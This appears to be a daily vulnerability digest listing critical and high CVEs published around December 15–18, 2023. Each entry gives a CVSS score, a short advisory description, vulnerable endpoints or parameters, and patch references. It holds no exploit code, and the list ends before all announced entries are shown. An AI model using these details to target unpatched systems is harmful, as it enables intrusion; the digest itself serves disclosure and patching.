Latest vulnerabilities [Monday, December 18, 2023 + weekend]

Latest vulnerabilities [Monday, December 18, 2023 + weekend]
{{titre}}

Last update performed on 12/18/2023 at 11:57:06 PM

(21) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : huntr.dev

Vulnerability ID : CVE-2023-6831

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

CVE ID : CVE-2023-6831
Source : security@huntr.dev
CVSS Score : 10.0

References :
https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 | source : security@huntr.dev
https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314 | source : security@huntr.dev

Vulnerability : CWE-29


Vulnerability ID : CVE-2023-6909

First published on : 18-12-2023 04:15:52
Last modified on : 18-12-2023 14:05:17

Description :
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

CVE ID : CVE-2023-6909
Source : security@huntr.dev
CVSS Score : 9.3

References :
https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 | source : security@huntr.dev
https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850 | source : security@huntr.dev

Vulnerability : CWE-29


Source : github.com

Vulnerability ID : CVE-2023-50721

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`.

CVE ID : CVE-2023-50721
Source : security-advisories@github.com
CVSS Score : 9.9

References :
https://github.com/xwiki/xwiki-platform/commit/62863736d78ffd60d822279c5fb7fb9593042766 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7654-vfh6-rw6x | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21200 | source : security-advisories@github.com

Vulnerability : CWE-94
Vulnerability : CWE-95


Vulnerability ID : CVE-2023-50723

First published on : 15-12-2023 19:15:10
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages.

CVE ID : CVE-2023-50723
Source : security-advisories@github.com
CVSS Score : 9.9

References :
https://github.com/xwiki/xwiki-platform/commit/0f367aaae4e0696f61cf5a67a75edd27d1d16db6 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/1157c1ecea395aac7f64cd8a6f484b1225416dc7 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/749f6aee1bfbcf191c3734ea0aa9eba3aa63240e | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/bd82be936c21b65dee367d558e3050b9b6995713 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qj86-p74r-7wp5 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21121 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21122 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21194 | source : security-advisories@github.com

Vulnerability : CWE-94
Vulnerability : CWE-95


Vulnerability ID : CVE-2023-50722

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`.

CVE ID : CVE-2023-50722
Source : security-advisories@github.com
CVSS Score : 9.6

References :
https://github.com/xwiki/xwiki-platform/commit/5e14c8d08fd0c5b619833d35090b470aa4cb52b0 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cp3j-273x-3jxc | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21167 | source : security-advisories@github.com

Vulnerability : CWE-352
Vulnerability : CWE-79


Vulnerability ID : CVE-2023-46116

First published on : 15-12-2023 14:15:14
Last modified on : 15-12-2023 15:26:42

Description :
Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue.

CVE ID : CVE-2023-46116
Source : security-advisories@github.com
CVSS Score : 9.3

References :
https://github.com/tutao/tutanota/blob/master/src/desktop/ApplicationWindow.ts#L417 | source : security-advisories@github.com
https://github.com/tutao/tutanota/blob/master/src/desktop/ApplicationWindow.ts#L423 | source : security-advisories@github.com
https://github.com/tutao/tutanota/commit/88ecad17d00d05a722399aed35f0d280899d55a2 | source : security-advisories@github.com
https://github.com/tutao/tutanota/security/advisories/GHSA-mxgj-pq62-f644 | source : security-advisories@github.com
https://user-images.githubusercontent.com/46137338/270564886-7a0389d3-f9ef-44e1-9f5e-57ccc72dcaa8.mp4 | source : security-advisories@github.com

Vulnerability : CWE-20


Source : cert.org.tw

Vulnerability ID : CVE-2023-48371

First published on : 15-12-2023 04:15:06
Last modified on : 15-12-2023 13:42:13

Description :
ITPison OMICARD EDM’s file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.

CVE ID : CVE-2023-48371
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7590-55002-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-48372

First published on : 15-12-2023 05:15:07
Last modified on : 15-12-2023 13:42:13

Description :
ITPison OMICARD EDM 's SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.

CVE ID : CVE-2023-48372
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7591-07c51-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48376

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.

CVE ID : CVE-2023-48376
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7595-d58b1-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-48384

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.

CVE ID : CVE-2023-48384
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7601-71c94-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48388

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.

CVE ID : CVE-2023-48388
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7603-b1061-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-798


Vulnerability ID : CVE-2023-48390

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service.

CVE ID : CVE-2023-48390
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7605-2d86d-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-48392

First published on : 15-12-2023 10:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator’s account, to execute login account’s permissions, and obtain relevant information.

CVE ID : CVE-2023-48392
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7622-57e5f-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-798


Source : wordfence.com

Vulnerability ID : CVE-2023-6553

First published on : 15-12-2023 11:15:47
Last modified on : 15-12-2023 13:41:51

Description :
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

CVE ID : CVE-2023-6553
Source : security@wordfence.com
CVSS Score : 9.8

References :
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L118 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L38 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L62 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L64 | source : security@wordfence.com
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3006541%40backup-backup&new=3006541%40backup-backup&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=cve | source : security@wordfence.com


Source : vuldb.com

Vulnerability ID : CVE-2023-6906

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:17

Description :
A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6906
Source : cna@vuldb.com
CVSS Score : 9.8

References :
https://github.com/unpWn4bL3/iot-security/blob/main/1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248268 | source : cna@vuldb.com
https://vuldb.com/?id.248268 | source : cna@vuldb.com

Vulnerability : CWE-120


Source : zabbix.com

Vulnerability ID : CVE-2023-32725

First published on : 18-12-2023 10:15:06
Last modified on : 18-12-2023 14:05:17

Description :
The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user.

CVE ID : CVE-2023-32725
Source : security@zabbix.com
CVSS Score : 9.6

References :
https://support.zabbix.com/browse/ZBX-23854 | source : security@zabbix.com

Vulnerability : CWE-565


Source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability ID : CVE-2023-33218

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device.

CVE ID : CVE-2023-33218
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 9.1

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Vulnerability ID : CVE-2023-33219

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
The handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device

CVE ID : CVE-2023-33219
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 9.1

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Vulnerability ID : CVE-2023-33220

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
During the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device

CVE ID : CVE-2023-33220
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 9.1

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Source : cert-in.org.in

Vulnerability ID : CVE-2023-6483

First published on : 18-12-2023 08:15:07
Last modified on : 18-12-2023 14:05:17

Description :
The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform.

CVE ID : CVE-2023-6483
Source : vdisclose@cert-in.org.in
CVSS Score : 9.1

References :
https://cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2023-0365 | source : vdisclose@cert-in.org.in

Vulnerability : CWE-287


Source : silabs.com

Vulnerability ID : CVE-2023-4020

First published on : 15-12-2023 21:15:08
Last modified on : 18-12-2023 14:05:33

Description :
An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory.

CVE ID : CVE-2023-4020
Source : product-security@silabs.com
CVSS Score : 9.0

References :
https://community.silabs.com/069Vm0000004b95IAA | source : product-security@silabs.com
https://github.com/SiliconLabs/gecko_sdk/releases | source : product-security@silabs.com

Vulnerability : CWE-20


(39) HIGH VULNERABILITIES [7.0, 8.9]

Source : cert.org.tw

Vulnerability ID : CVE-2023-48375

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
SmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service.

CVE ID : CVE-2023-48375
Source : twcert@cert.org.tw
CVSS Score : 8.8

References :
https://www.twcert.org.tw/tw/cp-132-7594-dac20-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-862


Vulnerability ID : CVE-2023-48394

First published on : 15-12-2023 10:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.

CVE ID : CVE-2023-48394
Source : twcert@cert.org.tw
CVSS Score : 8.8

References :
https://www.twcert.org.tw/tw/cp-132-7624-d0300-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-48373

First published on : 15-12-2023 05:15:08
Last modified on : 15-12-2023 13:42:13

Description :
ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.

CVE ID : CVE-2023-48373
Source : twcert@cert.org.tw
CVSS Score : 7.5

References :
https://www.twcert.org.tw/tw/cp-132-7592-998bf-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48378

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.

CVE ID : CVE-2023-48378
Source : twcert@cert.org.tw
CVSS Score : 7.5

References :
https://www.twcert.org.tw/tw/cp-132-7596-648f3-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48389

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.

CVE ID : CVE-2023-48389
Source : twcert@cert.org.tw
CVSS Score : 7.5

References :
https://www.twcert.org.tw/tw/cp-132-7604-ab0fd-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48380

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service.

CVE ID : CVE-2023-48380
Source : twcert@cert.org.tw
CVSS Score : 7.4

References :
https://www.twcert.org.tw/tw/cp-132-7598-37b03-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-78


Source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability ID : CVE-2023-6837

First published on : 15-12-2023 10:15:09
Last modified on : 15-12-2023 13:41:51

Description :
Multiple WSO2 products have been identified as vulnerable to perform user impersonatoin using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.

CVE ID : CVE-2023-6837
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 8.5

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1573/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8


Source : google.com

Vulnerability ID : CVE-2023-6817

First published on : 18-12-2023 15:15:10
Last modified on : 18-12-2023 17:24:19

Description :
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.

CVE ID : CVE-2023-6817
Source : cve-coordination@google.com
CVSS Score : 7.8

References :
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a | source : cve-coordination@google.com
https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a | source : cve-coordination@google.com

Vulnerability : CWE-416


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-6691

First published on : 18-12-2023 18:15:08
Last modified on : 18-12-2023 19:05:45

Description :
Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges.

CVE ID : CVE-2023-6691
Source : ics-cert@hq.dhs.gov
CVSS Score : 7.8

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-348-01 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-94


Source : wordfence.com

Vulnerability ID : CVE-2023-6827

First published on : 15-12-2023 08:15:46
Last modified on : 15-12-2023 13:42:13

Description :
The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVE ID : CVE-2023-6827
Source : security@wordfence.com
CVSS Score : 7.5

References :
https://plugins.trac.wordpress.org/browser/essential-real-estate/tags/4.3.5/lib/smart-framework/core/fonts/fonts.class.php#L524 | source : security@wordfence.com
https://plugins.trac.wordpress.org/changeset/3009780/essential-real-estate | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/8bb2ce22-077b-41dd-a2ff-cc1db9d20d38?source=cve | source : security@wordfence.com


Vulnerability ID : CVE-2023-6559

First published on : 16-12-2023 13:15:07
Last modified on : 18-12-2023 14:05:28

Description :
The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.

CVE ID : CVE-2023-6559
Source : security@wordfence.com
CVSS Score : 7.5

References :
https://plugins.trac.wordpress.org/changeset/3007879/mw-wp-form | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/412d555c-9bbd-42f5-8020-ccfc18755a79?source=cve | source : security@wordfence.com


Vulnerability ID : CVE-2023-6826

First published on : 15-12-2023 08:15:46
Last modified on : 15-12-2023 13:42:13

Description :
The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVE ID : CVE-2023-6826
Source : security@wordfence.com
CVSS Score : 7.2

References :
https://plugins.trac.wordpress.org/browser/e2pdf/trunk/classes/controller/e2pdf-templates.php?rev=2993824#L1488 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/e2pdf/trunk/classes/controller/e2pdf-templates.php?rev=2993824#L753 | source : security@wordfence.com
https://plugins.trac.wordpress.org/changeset/3009695/e2pdf#file0 | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/03faec37-2cce-4e14-92f2-d941ab1b4ce9?source=cve | source : security@wordfence.com


Source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability ID : CVE-2023-33217

First published on : 15-12-2023 11:15:08
Last modified on : 15-12-2023 13:41:51

Description :
By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it's possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer

CVE ID : CVE-2023-33217
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 7.5

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-20


Source : github.com

Vulnerability ID : CVE-2023-50719

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.

CVE ID : CVE-2023-50719
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/xwiki/xwiki-platform/commit/3e5272f2ef0dff06a8f4db10afd1949b2f9e6eea | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-p6cp-6r35-32mh | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21208 | source : security-advisories@github.com

Vulnerability : CWE-200
Vulnerability : CWE-359


Vulnerability ID : CVE-2023-50264

First published on : 15-12-2023 21:15:08
Last modified on : 18-12-2023 14:05:33

Description :
Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.

CVE ID : CVE-2023-50264
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/morpheus65535/bazarr/commit/17add7fbb3ae1919a40d505470d499d46df9ae6b | source : security-advisories@github.com
https://github.com/morpheus65535/bazarr/releases/tag/v1.3.1 | source : security-advisories@github.com
https://securitylab.github.com/advisories/GHSL-2023-192_GHSL-2023-194_bazarr/ | source : security-advisories@github.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-50265

First published on : 15-12-2023 21:15:08
Last modified on : 18-12-2023 14:05:33

Description :
Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.

CVE ID : CVE-2023-50265
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/morpheus65535/bazarr/commit/17add7fbb3ae1919a40d505470d499d46df9ae6b | source : security-advisories@github.com
https://github.com/morpheus65535/bazarr/releases/tag/v1.3.1 | source : security-advisories@github.com
https://securitylab.github.com/advisories/GHSL-2023-192_GHSL-2023-194_bazarr/ | source : security-advisories@github.com

Vulnerability : CWE-22


Source : hackerone.com

Vulnerability ID : CVE-2023-39340

First published on : 16-12-2023 02:15:07
Last modified on : 18-12-2023 14:05:33

Description :
A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance.

CVE ID : CVE-2023-39340
Source : support@hackerone.com
CVSS Score : 7.5

References :
https://forums.ivanti.com/s/article/Security-fix-release-Ivanti-Connect-Secure-22-6R2-and-22-6R2-1?language=en_US | source : support@hackerone.com


Source : bosch.com

Vulnerability ID : CVE-2023-32230

First published on : 18-12-2023 13:15:06
Last modified on : 18-12-2023 14:05:17

Description :
An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation.

CVE ID : CVE-2023-32230
Source : psirt@bosch.com
CVSS Score : 7.5

References :
https://psirt.bosch.com/security-advisories/BOSCH-SA-092656-BT.html | source : psirt@bosch.com

Vulnerability : CWE-703


Vulnerability ID : CVE-2023-39509

First published on : 18-12-2023 13:15:07
Last modified on : 18-12-2023 14:05:17

Description :
A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera.

CVE ID : CVE-2023-39509
Source : psirt@bosch.com
CVSS Score : 7.2

References :
https://psirt.bosch.com/security-advisories/BOSCH-SA-638184-BT.html | source : psirt@bosch.com

Vulnerability : CWE-20


Source : redhat.com

Vulnerability ID : CVE-2023-3430

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service.

CVE ID : CVE-2023-3430
Source : secalert@redhat.com
CVSS Score : 7.5

References :
https://bugzilla.redhat.com/show_bug.cgi?id=2218380 | source : secalert@redhat.com

Vulnerability : CWE-122


Vulnerability ID : CVE-2023-5384

First published on : 18-12-2023 14:15:11
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.

CVE ID : CVE-2023-5384
Source : secalert@redhat.com
CVSS Score : 7.2

References :
https://access.redhat.com/errata/RHSA-2023:7676 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5384 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2242156 | source : secalert@redhat.com

Vulnerability : CWE-312


Vulnerability ID : CVE-2023-47038

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.

CVE ID : CVE-2023-47038
Source : secalert@redhat.com
CVSS Score : 7.0

References :
https://access.redhat.com/security/cve/CVE-2023-47038 | source : secalert@redhat.com
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056746 | source : secalert@redhat.com
